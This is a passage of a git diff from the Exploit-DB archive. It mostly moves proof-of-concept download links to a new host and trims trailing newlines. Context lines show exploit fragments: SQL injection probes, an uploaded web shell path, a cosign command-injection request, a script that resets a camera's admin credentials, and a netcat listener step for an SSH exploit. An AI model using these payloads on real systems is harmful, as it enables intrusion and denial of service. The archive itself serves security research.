be3ebf6ca..724dc0855 100644 --- a/exploits/android/remote/40874.txt +++ b/exploits/android/remote/40874.txt @@ -88,4 +88,4 @@ This notification will be of size THREAD_SIZE*2, and will therefore fill up the Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40874.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40874.zip \ No newline at end of file diff --git a/exploits/arm/dos/40182.txt b/exploits/arm/dos/40182.txt index 81f032bf8..985402d9d 100644 --- a/exploits/arm/dos/40182.txt +++ b/exploits/arm/dos/40182.txt @@ -78,4 +78,4 @@ I have attached a completely untested patch that should fix the x86, arm and arm Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40182.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40182.zip \ No newline at end of file diff --git a/exploits/asp/remote/15213.pl b/exploits/asp/remote/15213.pl index 874114d95..8589908a6 100755 --- a/exploits/asp/remote/15213.pl +++ b/exploits/asp/remote/15213.pl @@ -10,7 +10,7 @@ # Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2. # A similar exploitation vector was also added lately in Padbuster v0.3: # http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/ -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15213.pl (padBuster.pl) +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15213.pl (padBuster.pl) # # # Giorgio Fedon - (giorgio.fedon@mindedsecurity.com) diff --git a/exploits/asp/webapps/14192.txt b/exploits/asp/webapps/14192.txt index a62cb914a..2742b47e0 100644 --- a/exploits/asp/webapps/14192.txt +++ b/exploits/asp/webapps/14192.txt @@ -17,4 +17,4 @@ Thank You For Your Perfect Web Site. http://server/main.asp?id=5945&grp=[SQL Injection] -[~]######################################### FinisH :D #############################################[~] +[~]######################################### FinisH :D #############################################[~] \ No newline at end of file diff --git a/exploits/asp/webapps/14821.txt b/exploits/asp/webapps/14821.txt index 2d72cace0..55fd0134d 100644 --- a/exploits/asp/webapps/14821.txt +++ b/exploits/asp/webapps/14821.txt @@ -16,4 +16,4 @@ admin page : http://site.com/[path]/admin.asp Victem : http://www.etoshop.com/demo/pcstore --------------------------------------------------------- -######################################################### +######################################################### \ No newline at end of file diff --git a/exploits/asp/webapps/14898.txt b/exploits/asp/webapps/14898.txt index 5abac131c..011daa55c 100644 --- a/exploits/asp/webapps/14898.txt +++ b/exploits/asp/webapps/14898.txt @@ -122,4 +122,4 @@ Persistent XSS Vulnerabilities: entity.Title = txtTitle_E.Text.Trim(); -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/14954.txt b/exploits/asp/webapps/14954.txt index 663163dbc..0b1cc6198 100644 --- a/exploits/asp/webapps/14954.txt +++ b/exploits/asp/webapps/14954.txt @@ -64,4 +64,4 @@ PoC: shell.aspx ---> http://Example.com/downloads/uploads/2010_7_25_shell.aspx Note that : the value 2010_7_25 is the exact date of server. -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/14969.txt b/exploits/asp/webapps/14969.txt index 05eecd590..0ab33e4e7 100644 --- a/exploits/asp/webapps/14969.txt +++ b/exploits/asp/webapps/14969.txt @@ -65,4 +65,4 @@ Description : Which the Password was encrypted by SHA algorithm using .../lib/sha256.asp file. -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/14991.txt b/exploits/asp/webapps/14991.txt index f3cdb9ba1..490a78776 100644 --- a/exploits/asp/webapps/14991.txt +++ b/exploits/asp/webapps/14991.txt @@ -35,4 +35,4 @@ Description : http://Example.com/Images/ -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/14999.txt b/exploits/asp/webapps/14999.txt index 308b052b6..c55ae8813 100644 --- a/exploits/asp/webapps/14999.txt +++ b/exploits/asp/webapps/14999.txt @@ -73,4 +73,4 @@ Persistent XSS: } -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15058.html b/exploits/asp/webapps/15058.html index cec16bcc6..da6fd81ac 100644 --- a/exploits/asp/webapps/15058.html +++ b/exploits/asp/webapps/15058.html @@ -82,4 +82,4 @@ This page remove Admins Role in VWD-CMS. -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15067.txt b/exploits/asp/webapps/15067.txt index f25d171be..61ee1c7eb 100644 --- a/exploits/asp/webapps/15067.txt +++ b/exploits/asp/webapps/15067.txt @@ -178,4 +178,4 @@ Persistent XSS and XSRF: --------------------------------------------------------------------------------------- -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15078.txt b/exploits/asp/webapps/15078.txt index c45aef19f..9f6077892 100644 --- a/exploits/asp/webapps/15078.txt +++ b/exploits/asp/webapps/15078.txt @@ -182,4 +182,4 @@ This page uploads a file -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15106.txt b/exploits/asp/webapps/15106.txt index afdc90726..dfa6fa217 100644 --- a/exploits/asp/webapps/15106.txt +++ b/exploits/asp/webapps/15106.txt @@ -60,4 +60,4 @@ Persistent XSS in admin section: http://Example.com/SearchResults.aspx?q={} -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15124.txt b/exploits/asp/webapps/15124.txt index ba78d0dd7..87a65226c 100644 --- a/exploits/asp/webapps/15124.txt +++ b/exploits/asp/webapps/15124.txt @@ -41,4 +41,4 @@ Description : and so on. -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15160.txt b/exploits/asp/webapps/15160.txt index 43173fefd..0cb95c349 100644 --- a/exploits/asp/webapps/15160.txt +++ b/exploits/asp/webapps/15160.txt @@ -159,4 +159,4 @@ This page uploads a file with "xml" extension -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/asp/webapps/15703.txt b/exploits/asp/webapps/15703.txt index 7b3970a4a..7617c6145 100644 --- a/exploits/asp/webapps/15703.txt +++ b/exploits/asp/webapps/15703.txt @@ -33,6 +33,4 @@ Personal # KinG,Bl4ckl0rd,Turk_server -# Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon - - +# Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon \ No newline at end of file diff --git a/exploits/asp/webapps/16241.txt b/exploits/asp/webapps/16241.txt index c8dd4416d..9cef3e5a8 100644 --- a/exploits/asp/webapps/16241.txt +++ b/exploits/asp/webapps/16241.txt @@ -23,5 +23,4 @@ http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE POC --- http://www.site.com/news/news.asp?id=256 and 1=1 TRUE -http://www.site.com/news/news.asp?id=256 and 1=0 FALSE - +http://www.site.com/news/news.asp?id=256 and 1=0 FALSE \ No newline at end of file diff --git a/exploits/asp/webapps/32660.txt b/exploits/asp/webapps/32660.txt index 243fcd01e..7c9f98132 100644 --- a/exploits/asp/webapps/32660.txt +++ b/exploits/asp/webapps/32660.txt @@ -7,7 +7,4 @@ [+] Tested on: Windows 7 and Linux [+] Vulnerable File: default.asp [+} Dork : intext:"Powered by CIS Manager" -[+] Exploit : http://host/site/default.asp?TroncoID=[SQL Injection] - - - +[+] Exploit : http://host/site/default.asp?TroncoID=[SQL Injection] \ No newline at end of file diff --git a/exploits/asp/webapps/42776.txt b/exploits/asp/webapps/42776.txt index 0368abf82..d6d8c5e4e 100644 --- a/exploits/asp/webapps/42776.txt +++ b/exploits/asp/webapps/42776.txt @@ -10,4 +10,4 @@ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42776.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42776.zip \ No newline at end of file diff --git a/exploits/asp/webapps/42792.txt b/exploits/asp/webapps/42792.txt index c032dafdd..27f4d3127 100644 --- a/exploits/asp/webapps/42792.txt +++ b/exploits/asp/webapps/42792.txt @@ -73,4 +73,4 @@ Help AG Middle East References ---------- [1] Help AG Middle East http://www.helpag.com/ -[2] Sitefinity CMS Version Notes http://www.sitefinity.com/product/version-notes +[2] Sitefinity CMS Version Notes http://www.sitefinity.com/product/version-notes \ No newline at end of file diff --git a/exploits/asp/webapps/8719.py b/exploits/asp/webapps/8719.py index fac2a895e..c39555a56 100755 --- a/exploits/asp/webapps/8719.py +++ b/exploits/asp/webapps/8719.py @@ -15,7 +15,7 @@ # for working with this exploit you need two asp file for updating hash you can download both from : # www.abysssec.com/files/dana.zip -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8719.zip (2009-dana.zip) +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8719.zip (2009-dana.zip) # then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code diff --git a/exploits/aspx/webapps/47793.txt b/exploits/aspx/webapps/47793.txt index d1ebe0677..e6b2bdc5c 100644 --- a/exploits/aspx/webapps/47793.txt +++ b/exploits/aspx/webapps/47793.txt @@ -47,4 +47,4 @@ Thanks @mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47793.zip \ No newline at end of file diff --git a/exploits/beos/local/19840.txt b/exploits/beos/local/19840.txt index 2f4904c0e..d75e41ad7 100644 --- a/exploits/beos/local/19840.txt +++ b/exploits/beos/local/19840.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1098/info A direct system call containing invalid parameters through int 0x25 will cause the BeOS to crash. Reboot of the machine is required in order to regain normal functionality. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19840.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19840.tgz \ No newline at end of file diff --git a/exploits/bsd/dos/19488.c b/exploits/bsd/dos/19488.c index 169ca5fec..4fac2e88e 100644 --- a/exploits/bsd/dos/19488.c +++ b/exploits/bsd/dos/19488.c @@ -31,7 +31,4 @@ write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); -} - - - +} \ No newline at end of file diff --git a/exploits/bsd/local/19411.txt b/exploits/bsd/local/19411.txt index 83ecdb175..97f095ff5 100644 --- a/exploits/bsd/local/19411.txt +++ b/exploits/bsd/local/19411.txt @@ -10,4 +10,4 @@ Hacker writes directly to device previously mounted as /usr, clearing file flags Hacker mounts modified device as /usr. Hacker installs backdoored /usr/bin/login. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19411.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19411.tgz \ No newline at end of file diff --git a/exploits/bsd/local/23655.txt b/exploits/bsd/local/23655.txt index 18fcaa100..6094ee268 100644 --- a/exploits/bsd/local/23655.txt +++ b/exploits/bsd/local/23655.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/9586/info A vulnerability has been reported to reside in the 'shmat()' system call used in the BSD kernel. Exploiting this issue may allow a local attacker to inject instructions into the memory of a privileged process. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23655.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23655.tar.gz \ No newline at end of file diff --git a/exploits/bsd/remote/19520.txt b/exploits/bsd/remote/19520.txt index 41a604b1e..c357ee7b7 100644 --- a/exploits/bsd/remote/19520.txt +++ b/exploits/bsd/remote/19520.txt @@ -3,7 +3,7 @@ This exploit was leaked on the Full Disclosure mailing list: http://seclists.org/fulldisclosure/2012/Jun/404 -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19520.zip +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19520.zip BSD telnetd Remote Root Exploit *ZERODAY* diff --git a/exploits/cfm/webapps/15120.txt b/exploits/cfm/webapps/15120.txt index ef985e2f3..e064064a4 100644 --- a/exploits/cfm/webapps/15120.txt +++ b/exploits/cfm/webapps/15120.txt @@ -105,5 +105,4 @@ References * Vendor advisory: http://www.getmura.com/index.cfm/blog/critical-security-patch/ - * CVE item: CVE-2010-3468 - + * CVE item: CVE-2010-3468 \ No newline at end of file diff --git a/exploits/cfm/webapps/16225.txt b/exploits/cfm/webapps/16225.txt index cb1cdfc6d..e44018d74 100644 --- a/exploits/cfm/webapps/16225.txt +++ b/exploits/cfm/webapps/16225.txt @@ -6,6 +6,4 @@ Dork : intext:"Powered by Alcassoft SOPHIA" SQL --- -http://site.com/path/dsp_page.cfm?pageid=[SQL] - - +http://site.com/path/dsp_page.cfm?pageid=[SQL] \ No newline at end of file diff --git a/exploits/cgi/webapps/22169.pl b/exploits/cgi/webapps/22169.pl index c63f5fc21..a5b44c2a4 100755 --- a/exploits/cgi/webapps/22169.pl +++ b/exploits/cgi/webapps/22169.pl @@ -129,4 +129,4 @@ be somewhere in the html output\n"; print $recv; print "the above is received from the server, if you have a 404 or 403, theres somethin wrong if not, and no command output, try again.. - if command ouput buggy, convert \\v to \\n with tr\n"; + if command ouput buggy, convert \\v to \\n with tr\n"; \ No newline at end of file diff --git a/exploits/cgi/webapps/28321.pl b/exploits/cgi/webapps/28321.pl index c723c687f..ba7843f9b 100755 --- a/exploits/cgi/webapps/28321.pl +++ b/exploits/cgi/webapps/28321.pl @@ -47,4 +47,4 @@ chmod -R 777 /mail/tmp/ ## Create smb backup mount point /bin/mkdir -p /mnt/smb/ -chmod 777 /mnt/smb/ +chmod 777 /mnt/smb/ \ No newline at end of file diff --git a/exploits/cgi/webapps/29844.txt b/exploits/cgi/webapps/29844.txt index a70164879..743dc1385 100644 --- a/exploits/cgi/webapps/29844.txt +++ b/exploits/cgi/webapps/29844.txt @@ -12,7 +12,4 @@ Cookie: cosign=X Content-Type: application/x-www-form-urlencoded Content-Length: N -required=&ref=https%3A%2F%2Fweblogin.example.com%2F&service=cosign-servicename=Y%0DLOGIN cosign=X2 1.2.3.4 username%0DREGISTER cosign=X2 1.2.3.4 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In - - - +required=&ref=https%3A%2F%2Fweblogin.example.com%2F&service=cosign-servicename=Y%0DLOGIN cosign=X2 1.2.3.4 username%0DREGISTER cosign=X2 1.2.3.4 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In \ No newline at end of file diff --git a/exploits/cgi/webapps/39871.txt b/exploits/cgi/webapps/39871.txt index 533462eaa..650348104 100644 --- a/exploits/cgi/webapps/39871.txt +++ b/exploits/cgi/webapps/39871.txt @@ -41,5 +41,4 @@ Raw Response: MTI3LjAuMC4xCWxvY2FsaG9zdC5sb2NhbGRvbWFpbglsb2NhbGhvc3QK - Base64 Decoded: 127.0.0.1 localhost.localdomain localhost - + Base64 Decoded: 127.0.0.1 localhost.localdomain localhost \ No newline at end of file diff --git a/exploits/cgi/webapps/40272.txt b/exploits/cgi/webapps/40272.txt index 2f53bfd92..2ad9d611c 100644 --- a/exploits/cgi/webapps/40272.txt +++ b/exploits/cgi/webapps/40272.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40272.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40272.zip \ No newline at end of file diff --git a/exploits/cgi/webapps/40273.txt b/exploits/cgi/webapps/40273.txt index 6d8aacf1d..195c68b46 100644 --- a/exploits/cgi/webapps/40273.txt +++ b/exploits/cgi/webapps/40273.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40273.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40273.zip \ No newline at end of file diff --git a/exploits/cgi/webapps/40274.txt b/exploits/cgi/webapps/40274.txt index e26bc9124..47e6c1108 100644 --- a/exploits/cgi/webapps/40274.txt +++ b/exploits/cgi/webapps/40274.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40274.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40274.zip \ No newline at end of file diff --git a/exploits/cgi/webapps/40303.sh b/exploits/cgi/webapps/40303.sh index 1ba96679f..eec0c8972 100755 --- a/exploits/cgi/webapps/40303.sh +++ b/exploits/cgi/webapps/40303.sh @@ -42,4 +42,4 @@ if [ $? -ne 0 ]; then echo " [ Error : libwww-perl not found =/" exit; fi - GET -H "Cookie: frame_rate=8; expansion=10; mode=43; user_id=guest; user_auth_level=43; behind_firewall=0" "http://$1/userconfigsubmit.cgi?adminid=$2&adpasswd=$3&repasswd=$3&user1=guest&userpw1=1337&repasswd1=1337&max_frame_user1=8&authority1=41&user2=&userpw2=&repasswd2=&max_frame_user2=6&authority2=40&user3=&userpw3=&repasswd3=&max_frame_user3=6&authority3=40&user4=&userpw4=&repasswd4=&max_frame_user4=6&authority4=40&user5=&userpw5=&repasswd5=&max_frame_user5=6&authority5=40&submit=submit" 0&> /dev/null <&1 + GET -H "Cookie: frame_rate=8; expansion=10; mode=43; user_id=guest; user_auth_level=43; behind_firewall=0" "http://$1/userconfigsubmit.cgi?adminid=$2&adpasswd=$3&repasswd=$3&user1=guest&userpw1=1337&repasswd1=1337&max_frame_user1=8&authority1=41&user2=&userpw2=&repasswd2=&max_frame_user2=6&authority2=40&user3=&userpw3=&repasswd3=&max_frame_user3=6&authority3=40&user4=&userpw4=&repasswd4=&max_frame_user4=6&authority4=40&user5=&userpw5=&repasswd5=&max_frame_user5=6&authority5=40&submit=submit" 0&> /dev/null <&1 \ No newline at end of file diff --git a/exploits/cgi/webapps/40304.txt b/exploits/cgi/webapps/40304.txt index 8648aa175..ea685f139 100644 --- a/exploits/cgi/webapps/40304.txt +++ b/exploits/cgi/webapps/40304.txt @@ -31,4 +31,4 @@ path=/ #root:x:0:0:root:/root:/bin/sh #root:x:0:0:root:/root:/usr/bin/cmd #tw:x:504:504::/home/tw:/bin/bash -#tw:x:504:504::/home/tw:/bin/msh +#tw:x:504:504::/home/tw:/bin/msh \ No newline at end of file diff --git a/exploits/freebsd/local/12090.txt b/exploits/freebsd/local/12090.txt index 921061102..a750030f1 100644 --- a/exploits/freebsd/local/12090.txt +++ b/exploits/freebsd/local/12090.txt @@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri improper handling of environment variables. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12090.pdf (cybsec_advisory_2010_0404.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12090.pdf (cybsec_advisory_2010_0404.pdf) \ No newline at end of file diff --git a/exploits/freebsd/local/12091.txt b/exploits/freebsd/local/12091.txt index ee8f5652d..a7ccfec01 100644 --- a/exploits/freebsd/local/12091.txt +++ b/exploits/freebsd/local/12091.txt @@ -14,4 +14,4 @@ Vulnerability Description: Some files that allow to obtain usernames and other internal information can be read by any user inside the CLI. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12091.pdf (cybsec_advisory_2010_0403.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12091.pdf (cybsec_advisory_2010_0403.pdf) \ No newline at end of file diff --git a/exploits/freebsd/remote/17462.txt b/exploits/freebsd/remote/17462.txt index 9651977fd..21e885190 100644 --- a/exploits/freebsd/remote/17462.txt +++ b/exploits/freebsd/remote/17462.txt @@ -196,7 +196,7 @@ Kingcope A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17462.tar.gz (ssh_0day.tar.gz) +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17462.tar.gz (ssh_0day.tar.gz) run like ./ssh -1 -z setup a netcat, port 443 on yourip first \ No newline at end of file diff --git a/exploits/freebsd/remote/18181.txt b/exploits/freebsd/remote/18181.txt index dfd347871..f0e4704e3 100644 --- a/exploits/freebsd/remote/18181.txt +++ b/exploits/freebsd/remote/18181.txt @@ -33,4 +33,4 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :> /Signed "the awesome" Kingcope Code: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18181.tar (7350roaringbeastv3.tar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18181.tar (7350roaringbeastv3.tar) \ No newline at end of file diff --git a/exploits/freebsd/remote/20593.txt b/exploits/freebsd/remote/20593.txt index d0ec94686..2783c8041 100644 --- a/exploits/freebsd/remote/20593.txt +++ b/exploits/freebsd/remote/20593.txt @@ -8,4 +8,4 @@ It is possible for packets that are not part of an established connection to be Exploitation of this vulnerability may allow for unauthorized remote access to otherwise protected services. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20593.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20593.tgz \ No newline at end of file diff --git a/exploits/freebsd/webapps/12658.txt b/exploits/freebsd/webapps/12658.txt index e6900b39c..fc1225cbc 100644 --- a/exploits/freebsd/webapps/12658.txt +++ b/exploits/freebsd/webapps/12658.txt @@ -15,4 +15,4 @@ improper profile check. =========== Download: =========== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf) \ No newline at end of file diff --git a/exploits/freebsd/webapps/24439.txt b/exploits/freebsd/webapps/24439.txt index d4b8b3c09..52647052e 100644 --- a/exploits/freebsd/webapps/24439.txt +++ b/exploits/freebsd/webapps/24439.txt @@ -48,4 +48,4 @@ ┌──────────────────┘ Dimitris Strevinas Obrela Security Industries - CONTACT: www.obrela.com + CONTACT: www.obrela.com \ No newline at end of file diff --git a/exploits/hardware/dos/11043.txt b/exploits/hardware/dos/11043.txt index 637a1381f..407af02d6 100644 --- a/exploits/hardware/dos/11043.txt +++ b/exploits/hardware/dos/11043.txt @@ -36,4 +36,4 @@ Email : f3arm3d3ar@gmail.com =============== Download =============== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11043.rar (Sony_Ericsson.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11043.rar (Sony_Ericsson.rar) \ No newline at end of file diff --git a/exploits/hardware/dos/11880.txt b/exploits/hardware/dos/11880.txt index 02110a319..7dd9b2939 100644 --- a/exploits/hardware/dos/11880.txt +++ b/exploits/hardware/dos/11880.txt @@ -106,4 +106,4 @@ close $sock; ##################################################################################### -(PRL-2010-01) +(PRL-2010-01) \ No newline at end of file diff --git a/exploits/hardware/dos/12093.txt b/exploits/hardware/dos/12093.txt index 0409d3849..9ac86c0cf 100644 --- a/exploits/hardware/dos/12093.txt +++ b/exploits/hardware/dos/12093.txt @@ -15,4 +15,4 @@ Users inside the CLI can run some kind of “Fork Bomb” in order to saturate s of an insecure ulimit value. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12093.pdf (cybsec_advisory_2010_0401.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12093.pdf (cybsec_advisory_2010_0401.pdf) \ No newline at end of file diff --git a/exploits/hardware/dos/13823.txt b/exploits/hardware/dos/13823.txt index f4b72717f..839999428 100644 --- a/exploits/hardware/dos/13823.txt +++ b/exploits/hardware/dos/13823.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13823.xls (savysoda_poc.xls) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13823.xls (savysoda_poc.xls) \ No newline at end of file diff --git a/exploits/hardware/dos/13824.txt b/exploits/hardware/dos/13824.txt index 3cc1f8e2b..519c4eeab 100644 --- a/exploits/hardware/dos/13824.txt +++ b/exploits/hardware/dos/13824.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13824.xls (office2_poc.xls) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13824.xls (office2_poc.xls) \ No newline at end of file diff --git a/exploits/hardware/dos/13825.txt b/exploits/hardware/dos/13825.txt index 41f3007e2..2ade278b0 100644 --- a/exploits/hardware/dos/13825.txt +++ b/exploits/hardware/dos/13825.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13825.xls (goodreader_poc.xls) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13825.xls (goodreader_poc.xls) \ No newline at end of file diff --git a/exploits/hardware/dos/18751.txt b/exploits/hardware/dos/18751.txt index 1a074f619..20254c582 100644 --- a/exploits/hardware/dos/18751.txt +++ b/exploits/hardware/dos/18751.txt @@ -130,7 +130,7 @@ other bugs and understanding them :) http://aluigi.org/poc/samsux_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18751.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18751.zip ####################################################################### diff --git a/exploits/hardware/dos/20821.txt b/exploits/hardware/dos/20821.txt index 4dd7d4bf3..26c8095c6 100644 --- a/exploits/hardware/dos/20821.txt +++ b/exploits/hardware/dos/20821.txt @@ -6,4 +6,4 @@ A problem in the Cisco Hot Standby Routing Protocol (HSRP) makes it possible to This problem makes it possible for system local to the network to deny service to legitmate users of that network segment. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20821.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20821.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/20824.txt b/exploits/hardware/dos/20824.txt index e7bcc4dd5..1e31687e8 100644 --- a/exploits/hardware/dos/20824.txt +++ b/exploits/hardware/dos/20824.txt @@ -6,4 +6,4 @@ A problem with the switch firmware could allow a Denial of Service to legitimate This problem makes it possible for a remote user to deny service to legitimate users of the switch. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20824.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20824.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/21092.txt b/exploits/hardware/dos/21092.txt index 493fed08b..d2a279ea4 100644 --- a/exploits/hardware/dos/21092.txt +++ b/exploits/hardware/dos/21092.txt @@ -7,4 +7,4 @@ CBOS becomes unstable when it receives multiple TCP connections on one of the tw This problem affects the following Cisco 600 series routers: 627, 633, 673, 675, 675E, 677, 677i and 678. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21092.mrc \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21092.mrc \ No newline at end of file diff --git a/exploits/hardware/dos/22596.txt b/exploits/hardware/dos/22596.txt index f7a29451a..ef987afe1 100644 --- a/exploits/hardware/dos/22596.txt +++ b/exploits/hardware/dos/22596.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/7575/info It has been reported that a problem with Verilink broadband routers exists in the handling of TFTP packets. Because of this, an attacker could potentially deny service to legitimate users of the network. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22596.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22596.zip \ No newline at end of file diff --git a/exploits/hardware/dos/22978.txt b/exploits/hardware/dos/22978.txt index 24042abb6..b1f0eb0d3 100644 --- a/exploits/hardware/dos/22978.txt +++ b/exploits/hardware/dos/22978.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/8323/info It has been reported that under some circumstances, a Cisco 